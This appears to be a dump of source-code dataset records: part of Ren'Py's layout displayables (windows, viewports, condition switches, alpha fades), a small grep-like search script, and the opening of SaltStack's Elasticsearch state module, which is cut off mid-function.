        # The style may override the child shown inside the window.
        return self.style.child or self.child
    def per_interact(self):
        # Join (creating if necessary) the size group named by the style,
        # so all windows in the group share the widest member's width.
        size_group = self.style.size_group
        if size_group:
            group = size_groups.get(size_group, None)
            if group is None:
                group = size_groups[size_group] = SizeGroup()
            group.members.append(self)
    def predict_one(self):
        pd = renpy.display.predict.displayable
        self.style._predict_window(pd)
    def render(self, width, height, st, at):
        # save some typing.
        style = self.style
        xminimum = scale(style.xminimum, width)
        yminimum = scale(style.yminimum, height)
        # A size group can force a larger minimum width.
        size_group = self.style.size_group
        if size_group and size_group in size_groups:
            xminimum = max(xminimum, size_groups[size_group].width(width, height, st, at))
        left_margin = scale(style.left_margin, width)
        left_padding = scale(style.left_padding, width)
        right_margin = scale(style.right_margin, width)
        right_padding = scale(style.right_padding, width)
        top_margin = scale(style.top_margin, height)
        top_padding = scale(style.top_padding, height)
        bottom_margin = scale(style.bottom_margin, height)
        bottom_padding = scale(style.bottom_padding, height)
        # c for combined.
        cxmargin = left_margin + right_margin
        cymargin = top_margin + bottom_margin
        cxpadding = left_padding + right_padding
        cypadding = top_padding + bottom_padding
        child = self.get_child()
        # Render the child into the area left after margins and padding.
        surf = render(child,
                      width - cxmargin - cxpadding,
                      height - cymargin - cypadding,
                      st, at)
        sw, sh = surf.get_size()
        # If we don't fill, shrink our size to fit.
        if not style.xfill:
            width = max(cxmargin + cxpadding + sw, xminimum)
        if not style.yfill:
            height = max(cymargin + cypadding + sh, yminimum)
        rv = renpy.display.render.Render(width, height)
        # Draw the background. The background should render at exactly the
        # requested size. (That is, be a Frame or a Solid.)
        if style.background:
            bw = width - cxmargin
            bh = height - cymargin
            back = render(style.background, bw, bh, st, at)
            style.background.place(rv, left_margin, top_margin, bw, bh, back, main=False)
        offsets = child.place(rv,
                              left_margin + left_padding,
                              top_margin + top_padding,
                              width - cxmargin - cxpadding,
                              height - cymargin - cypadding,
                              surf)
        # Draw the foreground. The foreground should render at exactly the
        # requested size. (That is, be a Frame or a Solid.)
        if style.foreground:
            bw = width - cxmargin
            bh = height - cymargin
            back = render(style.foreground, bw, bh, st, at)
            style.foreground.place(rv, left_margin, top_margin, bw, bh, back, main=False)
        if self.child:
            self.offsets = [ offsets ]
        self.window_size = width, height # W0201
        return rv
def dynamic_displayable_compat(st, at, expr):
    """Back-compat callback: evaluates `expr` into a displayable, and never
    asks for a redraw (None)."""
    return renpy.python.py_eval(expr), None
class DynamicDisplayable(renpy.display.core.Displayable):
    """
    :doc: disp_dynamic

    A displayable that can change its child based on a Python
    function, over the course of an interaction.

    `function`
        A function that is called with the arguments:

        * The amount of time the displayable has been shown for.
        * The amount of time any displayable with the same tag has been shown for.
        * Any positional or keyword arguments supplied to DynamicDisplayable.

        and should return a (d, redraw) tuple, where:

        * `d` is a displayable to show.
        * `redraw` is the amount of time to wait before calling the
          function again, or None to not call the function again
          before the start of the next interaction.

        `function` is called at the start of every interaction.

    As a special case, `function` may also be a python string that evaluates
    to a displayable. In that case, function is run once per interaction.

    ::

        # If tooltip is not empty, shows it in a text. Otherwise,
        # show Null. Checks every tenth of a second to see if the
        # tooltip has been updated.
        init python:
            def show_tooltip(st, at):
                if tooltip:
                    return tooltip, .1
                else:
                    return Null(), None

        image tooltipper = DynamicDisplayable(show_tooltip)
    """

    # The child is recomputed every interaction, so don't save it.
    nosave = [ 'child' ]
    def after_setstate(self):
        # Rebuild lazily on first use after loading.
        self.child = None
    def __init__(self, function, *args, **kwargs):
        super(DynamicDisplayable, self).__init__()
        self.child = None
        # String form: treat it as an expression to evaluate each
        # interaction, via the compatibility shim.
        if isinstance(function, basestring):
            args = ( function, )
            kwargs = { }
            function = dynamic_displayable_compat
        # Optional predict hook, pulled out of the keyword arguments so it
        # is not forwarded to `function`.
        self.predict_function = kwargs.pop("_predict_function", None)
        self.function = function
        self.args = args
        self.kwargs = kwargs
    def visit(self):
        # The child is dynamic, so there is nothing static to visit.
        return [ ]
    def update(self, st, at):
        """Calls `function` to (re)compute the child, scheduling a redraw
        if it asked for one."""
        child, redraw = self.function(st, at, *self.args, **self.kwargs)
        child = renpy.easy.displayable(child)
        child.visit_all(lambda c : c.per_interact())
        self.child = child
        if redraw is not None:
            renpy.display.render.redraw(self, redraw)
    def per_interact(self):
        # Force a re-evaluation at the start of every interaction.
        renpy.display.render.redraw(self, 0)
    def render(self, w, h, st, at):
        self.update(st, at)
        return renpy.display.render.render(self.child, w, h, st, at)
    def predict_one(self):
        if not self.predict_function:
            return
        for i in self.predict_function(*self.args, **self.kwargs):
            if i is not None:
                renpy.display.predict.displayable(i)
    def get_placement(self):
        # May be asked for placement before the first render.
        if not self.child:
            self.update(0, 0)
        return self.child.get_placement()
    def event(self, ev, x, y, st):
        if self.child:
            return self.child.event(ev, x, y, st)
# A cache of compiled conditions used by ConditionSwitch, mapping the
# condition source string to its compiled 'eval' bytecode.
cond_cache = { }
# Returns the displayable from the first (condition, displayable) pair in
# switch whose condition evaluates to true. A None condition always matches.
def condition_switch_pick(switch):
    for cond, d in switch:

        # None acts as the catch-all default.
        if cond is None:
            return d

        code = cond_cache.get(cond)
        if code is None:
            code = renpy.python.py_compile(cond, 'eval')
            cond_cache[cond] = code

        if renpy.python.py_eval_bytecode(code):
            return d

    raise Exception("Switch could not choose a displayable.")
def condition_switch_show(st, at, switch):
    # DynamicDisplayable callback: pick the active branch, never redraw.
    return (condition_switch_pick(switch), None)
def condition_switch_predict(switch):
    """Predict hook: under lint, every branch; otherwise only the picked one."""

    if renpy.game.lint:
        branches = [ ]
        for _cond, d in switch:
            branches.append(d)
        return branches

    return [ condition_switch_pick(switch) ]
def ConditionSwitch(*args, **kwargs):
    """
    :doc: disp_dynamic

    This is a displayable that changes what it is showing based on
    python conditions. The positional arguments should be given in
    groups of two, where each group consists of:

    * A string containing a python condition.
    * A displayable to use if the condition is true.

    The first true condition has its displayable shown; at least
    one condition should always be true. ::

        image jill = ConditionSwitch(
            "jill_beers > 4", "jill_drunk.png",
            "True", "jill_sober.png")
    """

    kwargs.setdefault('style', 'default')

    if len(args) % 2 != 0:
        raise Exception('ConditionSwitch takes an even number of arguments')

    switch = [ ]

    for pos in range(0, len(args), 2):
        cond = args[pos]
        d = args[pos + 1]

        # Pre-compile the condition so render-time evaluation is cheap.
        if cond not in cond_cache:
            cond_cache[cond] = renpy.python.py_compile(cond, 'eval')

        switch.append((cond, renpy.easy.displayable(d)))

    rv = DynamicDisplayable(
        condition_switch_show,
        switch,
        _predict_function=condition_switch_predict)

    return Position(rv, **kwargs)
def ShowingSwitch(*args, **kwargs):
    """
    :doc: disp_dynamic

    This is a displayable that changes what it is showing based on the
    images being shown on the screen. The positional arguments should
    be given in groups of two, where each group consists of:

    * A string giving an image name, or None to indicate the default.
    * A displayable to use if the condition is true.

    A default image should be specified.

    One use of ShowingSwitch is to have side images change depending on
    the current emotion of a character. For example::

        define e = Character("Eileen",
            show_side_image=ShowingSwitch(
                "eileen happy", Image("eileen_happy_side.png", xalign=1.0, yalign=1.0),
                "eileen vhappy", Image("eileen_vhappy_side.png", xalign=1.0, yalign=1.0),
                None, Image("eileen_happy_default.png", xalign=1.0, yalign=1.0),
                )
            )
    """

    layer = kwargs.pop('layer', 'master')

    if len(args) % 2 != 0:
        raise Exception('ShowingSwitch takes an even number of positional arguments')

    condargs = [ ]

    for pos in range(0, len(args), 2):
        name = args[pos]
        d = args[pos + 1]

        if name is None:
            # None is the fall-through default branch.
            cond = None
        else:
            if not isinstance(name, tuple):
                name = tuple(name.split())
            # Build a condition that checks whether the image is showing.
            cond = "renpy.showing(%r, layer=%r)" % (name, layer)

        condargs.append(cond)
        condargs.append(d)

    return ConditionSwitch(*condargs, **kwargs)
class IgnoresEvents(Container):
    """Wraps a child displayable, drawing it normally but blitting it
    without focus and swallowing every event."""

    def __init__(self, child, **properties):
        super(IgnoresEvents, self).__init__(**properties)
        self.add(child)

    def render(self, w, h, st, at):
        child_render = renpy.display.render.render(self.child, w, h, st, at)
        child_w, child_h = child_render.get_size()

        rv = renpy.display.render.Render(child_w, child_h)
        rv.blit(child_render, (0, 0), focus=False)

        return rv

    def get_placement(self):
        return self.child.get_placement()

    def event(self, ev, x, y, st):
        # Swallow every event.
        return None
def edgescroll_proportional(n):
    """
    An edgescroll function that makes the scroll speed directly
    proportional to the distance into the edge region - the identity
    mapping.
    """
    return n
class Viewport(Container):
    # A scrollable window onto a (possibly larger) child, with optional
    # mouse-wheel scrolling, dragging, and edge scrolling. Scroll state is
    # held in x/y Adjustment objects.

    # Serialization version; after_upgrade() backfills fields added in
    # later versions when older save data is loaded.
    __version__ = 5
    def after_upgrade(self, version):
        if version < 1:
            self.xadjustment = renpy.display.behavior.Adjustment(1, 0)
            self.yadjustment = renpy.display.behavior.Adjustment(1, 0)
            self.set_adjustments = False
            self.mousewheel = False
            self.draggable = False
            self.width = 0
            self.height = 0
        if version < 2:
            self.drag_position = None
        if version < 3:
            self.edge_size = False
            self.edge_speed = False
            self.edge_function = None
            self.edge_xspeed = 0
            self.edge_yspeed = 0
            self.edge_last_st = None
        if version < 4:
            self.xadjustment_param = None
            self.yadjustment_param = None
            self.offsets_param = (None, None)
            self.set_adjustments_param = True
            self.xinitial_param = None
            self.yinitial_param = None
        if version < 5:
            self.focusable = self.draggable
    def __init__(self,
                 child=None,
                 child_size=(None, None),
                 offsets=(None, None),
                 xadjustment=None,
                 yadjustment=None,
                 set_adjustments=True,
                 mousewheel=False,
                 draggable=False,
                 edgescroll=None,
                 style='viewport',
                 xinitial=None,
                 yinitial=None,
                 replaces=None,
                 **properties):
        super(Viewport, self).__init__(style=style, **properties)
        if child is not None:
            self.add(child)
        # Remember the constructor arguments; _show() turns them into the
        # live adjustment/offset state.
        self.xadjustment_param = xadjustment
        self.yadjustment_param = yadjustment
        self.offsets_param = offsets
        self.set_adjustments_param = set_adjustments
        self.xinitial_param = xinitial
        self.yinitial_param = yinitial
        self._show()
        if isinstance(replaces, Viewport):
            # Carry scroll and drag state over from the viewport this one
            # replaces, so the transition is seamless.
            self.xadjustment.range = replaces.xadjustment.range
            self.yadjustment.range = replaces.yadjustment.range
            self.xadjustment.value = replaces.xadjustment.value
            self.yadjustment.value = replaces.yadjustment.value
            self.xoffset = replaces.xoffset
            self.yoffset = replaces.yoffset
            self.drag_position = replaces.drag_position
        else:
            self.drag_position = None
        self.child_width, self.child_height = child_size
        self.mousewheel = mousewheel
        self.draggable = draggable
        # Layout participates in the focus system so drags get migrated.
        self.focusable = draggable
        self.width = 0
        self.height = 0
        # The speed at which we scroll in the x and y directions, in pixels
        # per second.
        self.edge_xspeed = 0
        self.edge_yspeed = 0
        # The last time we edgescrolled.
        self.edge_last_st = None
        if edgescroll is not None:
            # The size of the edges that trigger scrolling.
            self.edge_size = edgescroll[0]
            # How far from the edge we can scroll.
            self.edge_speed = edgescroll[1]
            # Optional third element: a function mapping edge distance
            # (0.0-1.0) to a speed multiplier.
            if len(edgescroll) >= 3:
                self.edge_function = edgescroll[2]
            else:
                self.edge_function = edgescroll_proportional
        else:
            self.edge_size = 0
            self.edge_speed = 0
            self.edge_function = edgescroll_proportional
    def _show(self):
        # Materialize the adjustments from the saved constructor params.
        if self.xadjustment_param is None:
            self.xadjustment = renpy.display.behavior.Adjustment(1, 0)
        else:
            self.xadjustment = self.xadjustment_param
        if self.yadjustment_param is None:
            self.yadjustment = renpy.display.behavior.Adjustment(1, 0)
        else:
            self.yadjustment = self.yadjustment_param
        if self.xadjustment.adjustable is None:
            self.xadjustment.adjustable = True
        if self.yadjustment.adjustable is None:
            self.yadjustment.adjustable = True
        self.set_adjustments = self.set_adjustments_param
        # Explicit offsets take precedence over the initial scroll position.
        offsets = self.offsets_param
        self.xoffset = offsets[0] if (offsets[0] is not None) else self.xinitial_param
        self.yoffset = offsets[1] if (offsets[1] is not None) else self.yinitial_param
    def per_interact(self):
        self.xadjustment.register(self)
        self.yadjustment.register(self)
    def render(self, width, height, st, at):
        self.width = width
        self.height = height
        # An explicit child size overrides the space offered to the child.
        child_width = self.child_width or width
        child_height = self.child_height or height
        surf = render(self.child, child_width, child_height, st, at)
        cw, ch = surf.get_size()
        if not self.style.xfill:
            width = min(cw, width)
        if not self.style.yfill:
            height = min(ch, height)
        if self.set_adjustments:
            # The scrollable range is whatever part of the child does not
            # fit in the viewport.
            self.xadjustment.range = max(cw - width, 0)
            self.xadjustment.page = width
            self.yadjustment.range = max(ch - height, 0)
            self.yadjustment.page = height
        # An int offset is absolute pixels; a float is a 0.0-1.0 fraction
        # of the scrollable range.
        if self.xoffset is not None:
            if isinstance(self.xoffset, int):
                value = self.xoffset
            else:
                value = max(cw - width, 0) * self.xoffset
            self.xadjustment.value = value
        if self.yoffset is not None:
            if isinstance(self.yoffset, int):
                value = self.yoffset
            else:
                value = max(ch - height, 0) * self.yoffset
            self.yadjustment.value = value
        # Advance edge scrolling by the time elapsed since the last frame.
        if self.edge_size and (self.edge_last_st is not None) and (self.edge_xspeed or self.edge_yspeed):
            duration = max(st - self.edge_last_st, 0)
            self.xadjustment.change(self.xadjustment.value + duration * self.edge_xspeed)
            self.yadjustment.change(self.yadjustment.value + duration * self.edge_yspeed)
            self.check_edge_redraw(st)
        cxo = -int(self.xadjustment.value)
        cyo = -int(self.yadjustment.value)
        self.offsets = [ (cxo, cyo) ]
        rv = renpy.display.render.Render(width, height)
        rv.blit(surf, (cxo, cyo))
        return rv
    def check_edge_redraw(self, st):
        # Schedule an immediate redraw while edge scrolling can still make
        # progress in the direction it is moving.
        redraw = False
        if (self.edge_xspeed > 0) and (self.xadjustment.value < self.xadjustment.range):
            redraw = True
        if (self.edge_xspeed < 0) and (self.xadjustment.value > 0):
            redraw = True
        if (self.edge_yspeed > 0) and (self.yadjustment.value < self.yadjustment.range):
            redraw = True
        if (self.edge_yspeed < 0) and (self.yadjustment.value > 0):
            redraw = True
        if redraw:
            renpy.display.render.redraw(self, 0)
            self.edge_last_st = st
        else:
            self.edge_last_st = None
    def event(self, ev, x, y, st):
        # Any event invalidates explicit offsets; the adjustments take over.
        self.xoffset = None
        self.yoffset = None
        rv = super(Viewport, self).event(ev, x, y, st)
        if rv is not None:
            return rv
        # Continue an in-progress drag if we hold the grab.
        if self.draggable and renpy.display.focus.get_grab() == self:
            oldx, oldy = self.drag_position
            dx = x - oldx
            dy = y - oldy
            self.xadjustment.change(self.xadjustment.value - dx)
            self.yadjustment.change(self.yadjustment.value - dy)
            self.drag_position = (x, y) # W0201
            if renpy.display.behavior.map_event(ev, 'viewport_drag_end'):
                renpy.display.focus.set_grab(None)
                raise renpy.display.core.IgnoreEvent()
        # Ignore events outside the viewport.
        # NOTE(review): the y test uses <= where the x test uses < - the
        # asymmetry looks unintentional, but is preserved here; confirm
        # before changing.
        if not ((0 <= x < self.width) and (0 <= y <= self.height)):
            return
        if self.mousewheel:
            if renpy.display.behavior.map_event(ev, 'viewport_up'):
                rv = self.yadjustment.change(self.yadjustment.value - self.yadjustment.step)
                if rv is not None:
                    return rv
                else:
                    raise renpy.display.core.IgnoreEvent()
            if renpy.display.behavior.map_event(ev, 'viewport_down'):
                rv = self.yadjustment.change(self.yadjustment.value + self.yadjustment.step)
                if rv is not None:
                    return rv
                else:
                    raise renpy.display.core.IgnoreEvent()
        if self.draggable:
            if renpy.display.behavior.map_event(ev, 'viewport_drag_start'):
                self.drag_position = (x, y)
                renpy.display.focus.set_grab(self)
                raise renpy.display.core.IgnoreEvent()
        if self.edge_size and ev.type in [ pygame.MOUSEMOTION, pygame.MOUSEBUTTONDOWN, pygame.MOUSEBUTTONUP ]:
            def speed(n, zero, one):
                """
                Given a position `n`, computes the speed. The speed is 0.0
                when `n` == `zero`, 1.0 when `n` == `one`, and linearly
                interpolated when between.
                Returns 0.0 when outside the bounds - in either direction.
                """
                n = 1.0 * (n - zero) / (one - zero)
                if n < 0.0:
                    return 0.0
                if n > 1.0:
                    return 0.0
                return n
            # Right/bottom edges scroll positive; left/top edges negative.
            xspeed = speed(x, self.width - self.edge_size, self.width)
            xspeed -= speed(x, self.edge_size, 0)
            self.edge_xspeed = self.edge_speed * self.edge_function(xspeed)
            yspeed = speed(y, self.height - self.edge_size, self.height)
            yspeed -= speed(y, self.edge_size, 0)
            self.edge_yspeed = self.edge_speed * self.edge_function(yspeed)
            if xspeed or yspeed:
                self.check_edge_redraw(st)
            else:
                self.edge_last_st = None
        return None
    def set_xoffset(self, offset):
        # External setter; takes effect at the next render.
        self.xoffset = offset
        renpy.display.render.redraw(self, 0)
    def set_yoffset(self, offset):
        self.yoffset = offset
        renpy.display.render.redraw(self, 0)
def LiveCrop(rect, child, **properties):
    """
    :doc: disp_imagelike

    This creates a displayable by cropping `child` to `rect`, where
    `rect` is an (x, y, width, height) tuple. ::

        image eileen cropped = LiveCrop((0, 0, 300, 300), "eileen happy")
    """

    crop_x, crop_y, crop_w, crop_h = rect

    # A non-scrolling viewport, offset into the child, does the cropping.
    return Viewport(
        child,
        offsets=(crop_x, crop_y),
        xmaximum=crop_w,
        ymaximum=crop_h,
        **properties)
class Side(Container):
    # Lays out up to nine children in a 3x3 grid of named positions:
    # corners (tl/tr/bl/br), edges (t/r/b/l), and center (c).

    possible_positions = set([ 'tl', 't', 'tr', 'r', 'br', 'b', 'bl', 'l', 'c'])
    def after_setstate(self):
        # Force a re-measure after loading from a save.
        self.sized = False
    def __init__(self, positions, style='side', **properties):
        super(Side, self).__init__(style=style, **properties)
        # Positions may be given as a space-separated string.
        if isinstance(positions, basestring):
            positions = positions.split()
        for i in positions:
            if not i in Side.possible_positions:
                raise Exception("Side used with impossible position '%s'." % (i,))
        self.positions = tuple(positions)
        # True once the row/column sizes have been computed and cached.
        self.sized = False
    def _clear(self):
        super(Side, self)._clear()
        self.sized = False
    def render(self, width, height, st, at):
        # Map each named position to its child, and to the child's index
        # (needed to store placement offsets in order).
        pos_d = { }
        pos_i = { }
        for i, (pos, d) in enumerate(zip(self.positions, self.children)):
            pos_d[pos] = d
            pos_i[pos] = i
        # Figure out the size of each widget (and hence where the
        # widget needs to be placed).
        if not self.sized:
            self.sized = True
            # Deal with various spacings.
            spacing = self.style.spacing
            # If any of the three positions on a side are occupied, reserve
            # `spacing` pixels for that side and shrink the axis.
            def spacer(a, b, c, axis):
                if (a in pos_d) or (b in pos_d) or (c in pos_d):
                    return spacing, axis - spacing
                else:
                    return 0, axis
            self.left_space, width = spacer('tl', 'l', 'bl', width) # W0201
            self.right_space, width = spacer('tr', 'r', 'br', width) # W0201
            self.top_space, height = spacer('tl', 't', 'tr', height) # W0201
            self.bottom_space, height = spacer('bl', 'b', 'br', height) # W0201
            # The sizes of the various borders.
            left = 0
            right = 0
            top = 0
            bottom = 0
            cwidth = 0
            cheight = 0
            # Render the child at `pos` to measure it, growing the running
            # (owidth, oheight) maxima; the throwaway render is killed.
            def sizeit(pos, width, height, owidth, oheight):
                if pos not in pos_d:
                    return owidth, oheight
                rend = render(pos_d[pos], width, height, st, at)
                rv = max(owidth, rend.width), max(oheight, rend.height)
                rend.kill()
                return rv
            # Measuring order matters: the center fixes the middle
            # row/column, then edges, then corners.
            cwidth, cheight = sizeit('c', width, height, 0, 0)
            cwidth, top = sizeit('t', cwidth, height, cwidth, top)
            cwidth, bottom = sizeit('b', cwidth, height, cwidth, bottom)
            left, cheight = sizeit('l', width, cheight, left, cheight)
            right, cheight = sizeit('r', width, cheight, right, cheight)
            left, top = sizeit('tl', left, top, left, top)
            left, bottom = sizeit('bl', left, bottom, left, bottom)
            right, top = sizeit('tr', right, top, right, top)
            right, bottom = sizeit('br', right, bottom, right, bottom)
            # Cache the computed grid sizes for subsequent renders.
            self.cwidth = cwidth # W0201
            self.cheight = cheight # W0201
            self.top = top # W0201
            self.bottom = bottom # W0201
            self.left = left # W0201
            self.right = right # W0201
        else:
            cwidth = self.cwidth
            cheight = self.cheight
            top = self.top
            bottom = self.bottom
            left = self.left
            right = self.right
        # Now, place everything onto the render.
        self.offsets = [ None ] * len(self.children)
        lefts = self.left_space
        rights = self.right_space
        tops = self.top_space
        bottoms = self.bottom_space
        # Clamp the center cell so the whole grid fits the offered size.
        cwidth = min(cwidth, width - left - lefts - right - rights)
        cheight = min(cheight, height - top - tops - bottom - bottoms)
        rv = renpy.display.render.Render(left + lefts + cwidth + rights + right,
                                         top + tops + cheight + bottoms + bottom)
        # Render the child at `pos` for real and place it into its cell.
        def place(pos, x, y, w, h):
            if pos not in pos_d:
                return
            d = pos_d[pos]
            i = pos_i[pos]
            rend = render(d, w, h, st, at)
            self.offsets[i] = pos_d[pos].place(rv, x, y, w, h, rend)
        # Column and row origins of the 3x3 grid.
        col1 = 0
        col2 = left + lefts
        col3 = left + lefts + cwidth + rights
        row1 = 0
        row2 = top + tops
        row3 = top + tops + cheight + bottoms
        place('c', col2, row2, cwidth, cheight)
        place('t', col2, row1, cwidth, top)
        place('r', col3, row2, right, cheight)
        place('b', col2, row3, cwidth, bottom)
        place('l', col1, row2, left, cheight)
        place('tl', col1, row1, left, top)
        place('tr', col3, row1, right, top)
        place('br', col3, row3, right, bottom)
        place('bl', col1, row3, left, bottom)
        return rv
class Alpha(renpy.display.core.Displayable):
    # Interpolates its child's alpha from `start` to `end` over `time`
    # seconds, optionally repeating, using the animation timebase, and/or
    # warping the completion fraction through `time_warp`.
    #
    # NOTE(review): the `bounce` parameter is accepted but never stored or
    # used by this class.
    def __init__(self, start, end, time, child=None, repeat=False, bounce=False,
                 anim_timebase=False, time_warp=None, **properties):
        super(Alpha, self).__init__(**properties)
        self.start = start
        self.end = end
        self.time = time
        self.child = renpy.easy.displayable(child)
        self.repeat = repeat
        self.anim_timebase = anim_timebase
        self.time_warp = time_warp
    def visit(self):
        return [ self.child ]
    def render(self, height, width, st, at):
        # NOTE(review): the first two parameters are named (height, width),
        # the reverse of the conventional order. They are forwarded to the
        # child's render in the same positional order, so positional
        # callers behave consistently - but the names are misleading;
        # confirm before relying on them by keyword.
        if self.anim_timebase:
            t = at
        else:
            t = st
        # Completion fraction in [0.0, 1.0].
        if self.time:
            done = min(t / self.time, 1.0)
        else:
            done = 1.0
        if renpy.game.less_updates:
            done = 1.0
        elif self.repeat:
            # Loop the animation and keep redrawing.
            done = done % 1.0
            renpy.display.render.redraw(self, 0)
        elif done != 1.0:
            # Still animating: redraw until complete.
            renpy.display.render.redraw(self, 0)
        if self.time_warp:
            done = self.time_warp(done)
        # Linear interpolation between the start and end alphas.
        alpha = self.start + done * (self.end - self.start)
        rend = renpy.display.render.render(self.child, height, width, st, at)
        w, h = rend.get_size()
        rv = renpy.display.render.Render(w, h)
        rv.blit(rend, (0, 0))
        rv.alpha = alpha
        return rv
class AdjustTimes(Container):
    """Rebases the shown (st) and animation (at) times of its child to the
    frame on which this displayable was first rendered."""

    def __init__(self, child, start_time, anim_time, **properties):
        super(AdjustTimes, self).__init__(**properties)

        self.start_time = start_time
        self.anim_time = anim_time

        self.add(child)

    def render(self, w, h, st, at):

        # Latch the base times on the first frame we are rendered.
        if self.start_time is None:
            self.start_time = renpy.game.interface.frame_time

        if self.anim_time is None:
            self.anim_time = renpy.game.interface.frame_time

        st = renpy.game.interface.frame_time - self.start_time
        at = renpy.game.interface.frame_time - self.anim_time

        child_render = renpy.display.render.render(self.child, w, h, st, at)
        child_w, child_h = child_render.get_size()

        rv = renpy.display.render.Render(child_w, child_h)
        rv.blit(child_render, (0, 0))

        self.offsets = [ (0, 0) ]

        return rv

    def get_placement(self):
        return self.child.get_placement()
class LiveTile(Container):
    """
    :doc: disp_imagelike

    Tiles `child` until it fills the area allocated to this displayable.
    ::

        image bg tile = LiveTile("bg.png")
    """

    def __init__(self, child, style='tile', **properties):
        super(LiveTile, self).__init__(style=style, **properties)
        self.add(child)

    def render(self, width, height, st, at):
        tile = renpy.display.render.render(self.child, width, height, st, at)
        tile_w, tile_h = tile.get_size()

        rv = renpy.display.render.Render(width, height)

        # Integer sizes, so range() can step across the tile grid.
        width = int(width)
        height = int(height)
        tile_w = int(tile_w)
        tile_h = int(tile_h)

        for ty in range(0, height, tile_h):
            for tx in range(0, width, tile_w):
                rv.blit(tile, (tx, ty), focus=False)

        return rv
class Flatten(Container):
    """
    :doc: disp_imagelike

    This flattens `child`, which may be made up of multiple textures, into
    a single texture.

    Certain operations, like the alpha transform property, apply to every
    texture making up a displayable, which can yield incorrect results
    when the textures overlap on screen. Flatten creates a single texture
    from multiple textures, which can prevent this problem.

    Flatten is a relatively expensive operation, and so should only be used
    when absolutely required.
    """

    def __init__(self, child, **properties):
        super(Flatten, self).__init__(**properties)
        self.add(child)

    def render(self, width, height, st, at):
        child_render = renpy.display.render.render(self.child, width, height, st, at)
        child_w, child_h = child_render.get_size()

        # Collapse the child's render tree into one texture.
        flat = child_render.render_to_texture(True)

        rv = renpy.display.render.Render(child_w, child_h)
        rv.blit(flat, (0, 0))

        # Keep the focus information from the unflattened render.
        rv.depends_on(child_render, focus=True)

        return rv
| 28.688819 | 110 | 0.565485 |
acfa7b977a45e4f251d02b3fab9297d506c304a1 | 646 | py | Python | ag_directories/ag.py | Shekcon/Ag | 2724ae2380d51bc2653320715b23640a358aa855 | [
"MIT"
] | 1 | 2018-09-15T14:00:45.000Z | 2018-09-15T14:00:45.000Z | ag_directories/ag.py | Shekcon/Personer-Project | 2724ae2380d51bc2653320715b23640a358aa855 | [
"MIT"
] | null | null | null | ag_directories/ag.py | Shekcon/Personer-Project | 2724ae2380d51bc2653320715b23640a358aa855 | [
"MIT"
] | null | null | null | from os import getcwd
from os.path import isfile
from get_input import find_pattern_path, check_option
from colect_open_files import open_file, colect_files_subdirectory
if __name__ == "__main__":
    # Parse the command-line flags, then the search pattern and start path.
    list_option = check_option()
    pattern, path = find_pattern_path()

    # Only --case-sensitive affects how a single file is searched.
    option = '--case-sensitive' if '--case-sensitive' in list_option else None

    # Bug fix: compare against the *result* of getcwd(), not the function
    # object itself - the old `path != getcwd` was always true.
    if path != getcwd() and isfile(path):
        # The target is a single file: search just that file.
        open_file(path, pattern, option)
    else:
        # The target is a directory: search every file collected under it.
        files = colect_files_subdirectory(path, list_option)
        for file in files:
            open_file(file, pattern, option)
acfa7cd4a7981e69fe3bd3697bd82c9f454bac73 | 17,983 | py | Python | salt/states/elasticsearch.py | johnskopis/salt | 86adb6b0fe40230b8be4c74229e897a7a08f81a6 | [
"Apache-2.0"
] | 5 | 2018-05-01T20:51:14.000Z | 2021-11-09T05:43:00.000Z | salt/states/elasticsearch.py | johnskopis/salt | 86adb6b0fe40230b8be4c74229e897a7a08f81a6 | [
"Apache-2.0"
] | 4 | 2019-02-08T17:53:38.000Z | 2019-06-06T16:17:27.000Z | salt/states/elasticsearch.py | johnskopis/salt | 86adb6b0fe40230b8be4c74229e897a7a08f81a6 | [
"Apache-2.0"
] | 7 | 2017-09-29T18:49:53.000Z | 2021-11-09T05:42:49.000Z | # -*- coding: utf-8 -*-
'''
State module to manage Elasticsearch.
.. versionadded:: 2017.7.0
'''
# Import python libs
from __future__ import absolute_import, print_function, unicode_literals
import logging
# Import salt libs
from salt.ext import six
import salt.utils.json
log = logging.getLogger(__name__)
def index_absent(name):
    '''
    Ensure that the named index is absent.

    name
        Name of the index to remove
    '''
    ret = {'name': name, 'changes': {}, 'result': True, 'comment': ''}

    try:
        existing = __salt__['elasticsearch.index_get'](index=name)

        # Nothing to do if the index does not exist.
        if not existing or name not in existing:
            ret['comment'] = 'Index {0} is already absent'.format(name)
            return ret

        # Test mode: report what would happen, change nothing.
        if __opts__['test']:
            ret['result'] = None
            ret['comment'] = 'Index {0} will be removed'.format(name)
            ret['changes']['old'] = existing[name]
            return ret

        ret['result'] = __salt__['elasticsearch.index_delete'](index=name)
        if ret['result']:
            ret['comment'] = 'Successfully removed index {0}'.format(name)
            ret['changes']['old'] = existing[name]
        else:
            ret['comment'] = 'Failed to remove index {0} for unknown reasons'.format(name)
    except Exception as err:
        ret['result'] = False
        ret['comment'] = six.text_type(err)

    return ret
def index_present(name, definition=None):
    '''
    Ensure that the named index is present.

    name
        Name of the index to add

    definition
        Optional dict for creation parameters as per https://www.elastic.co/guide/en/elasticsearch/reference/current/indices-create-index.html

    **Example:**

    .. code-block:: yaml

        # Default settings
        mytestindex:
          elasticsearch_index.present

        # Extra settings
        mytestindex2:
          elasticsearch_index.present:
            - definition:
                settings:
                  index:
                    number_of_shards: 10
    '''
    ret = {'name': name, 'changes': {}, 'result': True, 'comment': ''}

    try:
        # Nothing to do if the index already exists.
        if __salt__['elasticsearch.index_exists'](index=name):
            ret['comment'] = 'Index {0} is already present'.format(name)
            return ret

        # Test mode: report what would happen, change nothing.
        if __opts__['test']:
            ret['result'] = None
            ret['comment'] = 'Index {0} does not exist and will be created'.format(name)
            ret['changes'] = {'new': definition}
            return ret

        output = __salt__['elasticsearch.index_create'](index=name, body=definition)
        if output:
            ret['comment'] = 'Successfully created index {0}'.format(name)
            # Report the index as Elasticsearch actually created it.
            ret['changes'] = {'new': __salt__['elasticsearch.index_get'](index=name)[name]}
        else:
            ret['result'] = False
            ret['comment'] = 'Cannot create index {0}, {1}'.format(name, output)
    except Exception as err:
        ret['result'] = False
        ret['comment'] = six.text_type(err)

    return ret
def alias_absent(name, index):
    '''
    Ensure that the index alias is absent.

    name
        Name of the index alias to remove

    index
        Name of the index for the alias
    '''
    ret = {'name': name, 'changes': {}, 'result': True, 'comment': ''}

    try:
        alias = __salt__['elasticsearch.alias_get'](aliases=name, indices=index)

        # The alias definition for this (index, name) pair, if any.
        old = alias.get(index, {}).get("aliases", {}).get(name, None) if alias else None

        if old is None:
            ret['comment'] = 'Alias {0} for index {1} is already absent'.format(name, index)
            return ret

        # Test mode: report what would happen, change nothing.
        if __opts__['test']:
